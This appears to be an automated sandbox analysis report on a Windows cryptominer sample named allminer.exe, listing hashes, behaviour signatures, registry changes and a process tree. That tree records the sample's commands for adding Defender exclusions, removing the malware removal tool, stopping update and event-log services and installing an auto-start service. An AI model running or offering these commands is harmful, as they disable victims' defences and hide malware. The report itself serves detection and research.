Analysis
-
max time kernel
42s -
max time network
82s -
platform
windows10-2004_x64 -
resource
win10v2004-20240226-en -
resource tags
arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system -
submitted
28/02/2024, 11:28
Static task
static1
Behavioral task
behavioral1
Sample
allminer.exe
Resource
win7-20240221-en
Behavioral task
behavioral2
Sample
allminer.exe
Resource
win10v2004-20240226-en
General
-
Target
allminer.exe
-
Size
5.2MB
-
MD5
4450c620c5d1dd08eea7c3ad5270f6df
-
SHA1
91389a8503852ac27662ecd6631dcee0eedeeef2
-
SHA256
30d76e09797fbe92ce2ed452177f3ae3cf67ce0173bfbbe7fa46f540e8e43ef8
-
SHA512
9792fbbe7e7192f431443ab53b4f8c04ada9b7647934c9385923d023fc030e23a8e56b50438e161409fa5b70f63ad346e9619d2b1bf50384fe4a982c0942697e
-
SSDEEP
98304:GvtPA6xB+3IFNaFE/1ZT6Pvn2F9rpV5BJmTlOlJBscGF4n0OC0IO+o6266ivSXXU:GvtPA61l/b0vnutfBqeQFT0ic4J
Malware Config
Signatures
-
Creates new service(s) 1 TTPs
-
Stops running service(s) 3 TTPs
-
Executes dropped EXE 1 IoCs
pid Process 2244 gmstcccpdzbb.exe -
Drops file in System32 directory 2 IoCs
description ioc Process File opened for modification C:\Windows\system32\MRT.exe allminer.exe File opened for modification C:\Windows\System32\CatRoot2\dberr.txt powershell.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 116 set thread context of 3140 116 allminer.exe 112 -
Launches sc.exe 14 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 1540 sc.exe 2792 sc.exe 4500 sc.exe 2608 sc.exe 4416 sc.exe 4740 sc.exe 2024 sc.exe 1552 sc.exe 4164 sc.exe 1512 sc.exe 2648 sc.exe 3312 sc.exe 3236 sc.exe 3280 sc.exe -
Modifies data under HKEY_USERS 41 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe -
Suspicious behavior: EnumeratesProcesses 25 IoCs
pid Process 116 allminer.exe 3536 powershell.exe 3536 powershell.exe 116 allminer.exe 116 allminer.exe 116 allminer.exe 116 allminer.exe 116 allminer.exe 116 allminer.exe 116 allminer.exe 116 allminer.exe 116 allminer.exe 116 allminer.exe 116 allminer.exe 116 allminer.exe 3140 dialer.exe 3140 dialer.exe 116 allminer.exe 3140 dialer.exe 3140 dialer.exe 116 allminer.exe 116 allminer.exe 2244 gmstcccpdzbb.exe 3552 powershell.exe 3552 powershell.exe -
Suspicious use of AdjustPrivilegeToken 11 IoCs
description pid Process Token: SeDebugPrivilege 3536 powershell.exe Token: SeDebugPrivilege 116 allminer.exe Token: SeShutdownPrivilege 3548 powercfg.exe Token: SeCreatePagefilePrivilege 3548 powercfg.exe Token: SeShutdownPrivilege 2108 powercfg.exe Token: SeCreatePagefilePrivilege 2108 powercfg.exe Token: SeShutdownPrivilege 2416 powercfg.exe Token: SeCreatePagefilePrivilege 2416 powercfg.exe Token: SeShutdownPrivilege 1048 powercfg.exe Token: SeCreatePagefilePrivilege 1048 powercfg.exe Token: SeDebugPrivilege 3140 dialer.exe -
Suspicious use of WriteProcessMemory 44 IoCs
description pid Process procid_target PID 3192 wrote to memory of 1220 3192 cmd.exe 99 PID 3192 wrote to memory of 1220 3192 cmd.exe 99 PID 116 wrote to memory of 3140 116 allminer.exe 112 PID 116 wrote to memory of 3140 116 allminer.exe 112 PID 116 wrote to memory of 3140 116 allminer.exe 112 PID 116 wrote to memory of 3140 116 allminer.exe 112 PID 116 wrote to memory of 3140 116 allminer.exe 112 PID 116 wrote to memory of 3140 116 allminer.exe 112 PID 116 wrote to memory of 3140 116 allminer.exe 112 PID 3140 wrote to memory of 612 3140 dialer.exe 84 PID 3140 wrote to memory of 680 3140 dialer.exe 3 PID 3140 wrote to memory of 956 3140 dialer.exe 80 PID 3140 wrote to memory of 1008 3140 dialer.exe 6 PID 680 wrote to memory of 2796 680 lsass.exe 46 PID 3140 wrote to memory of 512 3140 dialer.exe 79 PID 680 wrote to memory of 2796 680 lsass.exe 46 PID 3140 wrote to memory of 744 3140 dialer.exe 78 PID 680 wrote to memory of 2796 680 lsass.exe 46 PID 680 wrote to memory of 2796 680 lsass.exe 46 PID 3140 wrote to memory of 1028 3140 dialer.exe 7 PID 680 wrote to memory of 2796 680 lsass.exe 46 PID 680 wrote to memory of 2796 680 lsass.exe 46 PID 680 wrote to memory of 2796 680 lsass.exe 46 PID 3140 wrote to memory of 1096 3140 dialer.exe 76 PID 680 wrote to memory of 2796 680 lsass.exe 46 PID 3140 wrote to memory of 1108 3140 dialer.exe 75 PID 3140 wrote to memory of 1184 3140 dialer.exe 74 PID 3140 wrote to memory of 1212 3140 dialer.exe 8 PID 680 wrote to memory of 2796 680 lsass.exe 46 PID 680 wrote to memory of 2796 680 lsass.exe 46 PID 3140 wrote to memory of 1248 3140 dialer.exe 9 PID 3140 wrote to memory of 1292 3140 dialer.exe 73 PID 3140 wrote to memory of 1324 3140 dialer.exe 72 PID 3140 wrote to memory of 1464 3140 dialer.exe 71 PID 1464 wrote to memory of 3640 1464 svchost.exe 134 PID 1464 wrote to memory of 3640 1464 svchost.exe 134 PID 1464 wrote to memory of 1752 1464 svchost.exe 136 PID 1464 wrote to memory of 1752 1464 svchost.exe 136 PID 1464 wrote to memory of 2628 1464 svchost.exe 137 PID 1464 wrote to memory of 2628 1464 svchost.exe 137 PID 1464 wrote to memory of 5088 1464 svchost.exe 138 PID 1464 wrote to memory of 5088 1464 svchost.exe 138 PID 1464 wrote to memory of 2132 1464 svchost.exe 139 PID 1464 wrote to memory of 2132 1464 svchost.exe 139
Processes
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe1⤵
- Suspicious use of WriteProcessMemory
PID:680
-
C:\Windows\system32\dwm.exe"dwm.exe"1⤵PID:1008
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts1⤵PID:1028
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog1⤵PID:1212
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc1⤵PID:1248
-
C:\Windows\sysmon.exeC:\Windows\sysmon.exe1⤵PID:2796
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager1⤵
- Suspicious use of WriteProcessMemory
PID:1464 -
C:\Windows\system32\sihost.exesihost.exe2⤵PID:3640
-
-
C:\Windows\system32\sihost.exesihost.exe2⤵PID:1752
-
-
C:\Windows\system32\sihost.exesihost.exe2⤵PID:2628
-
-
C:\Windows\system32\sihost.exesihost.exe2⤵PID:5088
-
-
C:\Windows\system32\sihost.exesihost.exe2⤵PID:2132
-
-
C:\Windows\system32\sihost.exesihost.exe2⤵PID:3672
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s nsi1⤵PID:1324
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc1⤵PID:1292
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule1⤵PID:1184
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc1⤵PID:1108
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService1⤵PID:1096
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s DsmSvc1⤵PID:744
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc1⤵PID:512
-
C:\Windows\system32\winlogon.exewinlogon.exe2⤵PID:612
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM1⤵PID:956
-
C:\Users\Admin\AppData\Local\Temp\allminer.exe"C:\Users\Admin\AppData\Local\Temp\allminer.exe"1⤵
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:116 -
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3536
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop UsoSvc2⤵
- Launches sc.exe
PID:1540
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart2⤵
- Suspicious use of WriteProcessMemory
PID:3192 -
C:\Windows\system32\wusa.exewusa /uninstall /kb:890830 /quiet /norestart3⤵PID:1220
-
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop WaaSMedicSvc2⤵
- Launches sc.exe
PID:2648
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop wuauserv2⤵
- Launches sc.exe
PID:3312
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop bits2⤵
- Launches sc.exe
PID:2792
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop dosvc2⤵
- Launches sc.exe
PID:4500
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 02⤵
- Suspicious use of AdjustPrivilegeToken
PID:2416
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 02⤵
- Suspicious use of AdjustPrivilegeToken
PID:3548
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-ac 02⤵
- Suspicious use of AdjustPrivilegeToken
PID:1048
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-dc 02⤵
- Suspicious use of AdjustPrivilegeToken
PID:2108
-
-
C:\Windows\system32\dialer.exeC:\Windows\system32\dialer.exe2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3140
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe delete "XLZQHCLS"2⤵
- Launches sc.exe
PID:2024
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe create "XLZQHCLS" binpath= "C:\ProgramData\oaocofwmfjha\gmstcccpdzbb.exe" start= "auto"2⤵
- Launches sc.exe
PID:3236
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop eventlog2⤵
- Launches sc.exe
PID:2608
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe start "XLZQHCLS"2⤵
- Launches sc.exe
PID:4416
-
-
C:\ProgramData\oaocofwmfjha\gmstcccpdzbb.exeC:\ProgramData\oaocofwmfjha\gmstcccpdzbb.exe1⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:2244 -
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:3552
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart2⤵PID:2036
-
C:\Windows\system32\wusa.exewusa /uninstall /kb:890830 /quiet /norestart3⤵PID:3544
-
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop WaaSMedicSvc2⤵
- Launches sc.exe
PID:1552
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop UsoSvc2⤵
- Launches sc.exe
PID:4164
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop wuauserv2⤵
- Launches sc.exe
PID:1512
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop bits2⤵
- Launches sc.exe
PID:4740
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop dosvc2⤵
- Launches sc.exe
PID:3280
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 02⤵PID:3576
-
-
C:\Windows\system32\dialer.exeC:\Windows\system32\dialer.exe2⤵PID:4484
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-dc 02⤵PID:1460
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-ac 02⤵PID:3592
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 02⤵PID:3868
-
-
C:\Windows\system32\dialer.exeC:\Windows\system32\dialer.exe2⤵PID:1384
-
-
C:\Windows\system32\dialer.exedialer.exe2⤵PID:1648
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
5.2MB
MD54450c620c5d1dd08eea7c3ad5270f6df
SHA191389a8503852ac27662ecd6631dcee0eedeeef2
SHA25630d76e09797fbe92ce2ed452177f3ae3cf67ce0173bfbbe7fa46f540e8e43ef8
SHA5129792fbbe7e7192f431443ab53b4f8c04ada9b7647934c9385923d023fc030e23a8e56b50438e161409fa5b70f63ad346e9619d2b1bf50384fe4a982c0942697e
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
19KB
MD5925191edcf579c11fcd381082c8a26b8
SHA12d71a58d069a1645a399940b1b95590887b3b03c
SHA2569112a3c7bd44c131d515336fdab063f5069157cbc0b61ed278f2faa4b8f7aa0f
SHA51251ef3d78ea0ca833cdb337d93a38f0cdb17601924347d12c90e01ffcefa4a61addec4d8fe603234237c66a81661e9953e86f0be5012f7a183db3ff2dfb00f1ac